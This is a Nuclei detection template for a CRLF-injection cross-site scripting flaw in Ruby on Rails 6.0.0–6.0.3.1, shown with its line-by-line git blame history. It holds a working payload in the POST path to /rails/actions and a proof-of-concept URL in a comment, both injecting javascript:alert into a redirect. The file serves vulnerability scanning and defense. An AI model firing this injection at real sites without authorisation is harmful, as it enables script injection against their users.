nuclei-templates/http/vulnerabilities/rails/rails6-xss.yaml

id: rails6-xss

#  XSS (6.0.0 - 6.0.3.1); Payload is location=%0djavascript:alert(1);
#  Nuclei has issues with 302 response missing a Location header thus the
#  extended payload to make Nuclei work.
#  Working poc by @Mad-robot
# /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0Djavascript%3Aalert%28document.domain%29
info:
  name: Ruby on Rails - CRLF Injection and Cross-Site Scripting
  author: ooooooo_q,rootxharsh,iamnoooob
  severity: medium
  description: Ruby on Rails 6.0.0-6.0.3.1 contains a CRLF issue which allows JavaScript to be injected into the response, resulting in cross-site scripting.
  reference:
    - https://hackerone.com/reports/904059
  metadata:
    max-request: 1
  tags: rails,xss,crlf,hackerone

http:
  - method: POST
    path:
      - "{{BaseURL}}/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'javascript:alert(1)'
        part: body

      - type: status
        status:
          - 302

      - type: word
        words:
          - 'Location: aaaaa'
          - 'text/html'
        part: header
        condition: and

# digest: 4a0a00473045022100b2b23efd1f25ed4f38c04e28e6009e7c4135b763d70a13e1692e9169c4d0160902205ce411f94817587139aa8e279e05694e334d08a5ce79fa5ee3b07e075cf4b4af:922c64590222798bb761d5b6d8e72950
updated rails6-xss 2020-12-23 09:24:03 +00:00			`id: rails6-xss`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00
Dashboard Content Enhancements (#5455) Dashboard Content Enhancements 2022-09-23 17:53:08 +00:00			`# XSS (6.0.0 - 6.0.3.1); Payload is location=%0djavascript:alert(1);`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`# Nuclei has issues with 302 response missing a Location header thus the`
			`# extended payload to make Nuclei work.`
			`# Working poc by @Mad-robot`
			`# /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0Djavascript%3Aalert%28document.domain%29`
Add Rails 6 XSS 2020-12-22 22:25:41 +00:00			`info:`
Dashboard Content Enhancements (#5455) Dashboard Content Enhancements 2022-09-23 17:53:08 +00:00			`name: Ruby on Rails - CRLF Injection and Cross-Site Scripting`
Updated author names 2021-06-09 12:20:56 +00:00			`author: ooooooo_q,rootxharsh,iamnoooob`
Update CVE-2020-8185.yaml 2020-12-23 02:33:49 +00:00			`severity: medium`
Dashboard Content Enhancements (#5455) Dashboard Content Enhancements 2022-09-23 17:53:08 +00:00			`description: Ruby on Rails 6.0.0-6.0.3.1 contains a CRLF issue which allows JavaScript to be injected into the response, resulting in cross-site scripting.`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://hackerone.com/reports/904059`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
templateman update 2023-10-14 11:27:55 +00:00			`tags: rails,xss,crlf,hackerone`
Update CVE-2020-8185.yaml 2020-12-23 02:33:49 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Add Rails 6 XSS 2020-12-22 22:25:41 +00:00			`- method: POST`
			`path:`
Added working poc as comment 2021-02-14 18:45:07 +00:00			`- "{{BaseURL}}/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa"`
tags improvements 2021-04-06 08:15:46 +00:00
Add Rails 6 XSS 2020-12-22 22:25:41 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
Added working poc as comment 2021-02-14 18:45:07 +00:00			`- 'javascript:alert(1)'`
Add Rails 6 XSS 2020-12-22 22:25:41 +00:00			`part: body`
templateman update 2023-10-14 11:27:55 +00:00
Add Rails 6 XSS 2020-12-22 22:25:41 +00:00			`- type: status`
			`status:`
Formatted YAML 2020-12-22 22:33:16 +00:00			`- 302`
templateman update 2023-10-14 11:27:55 +00:00
Update CVE-2020-8185.yaml 2020-12-23 02:33:49 +00:00			`- type: word`
			`words:`
Update rails6-xss.yaml 2021-02-14 19:01:40 +00:00			`- 'Location: aaaaa'`
Update CVE-2020-8185.yaml 2020-12-23 02:33:49 +00:00			`- 'text/html'`
			`part: header`
Update rails6-xss.yaml 2021-02-14 13:34:20 +00:00			`condition: and`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4a0a00473045022100b2b23efd1f25ed4f38c04e28e6009e7c4135b763d70a13e1692e9169c4d0160902205ce411f94817587139aa8e279e05694e334d08a5ce79fa5ee3b07e075cf4b4af:922c64590222798bb761d5b6d8e72950`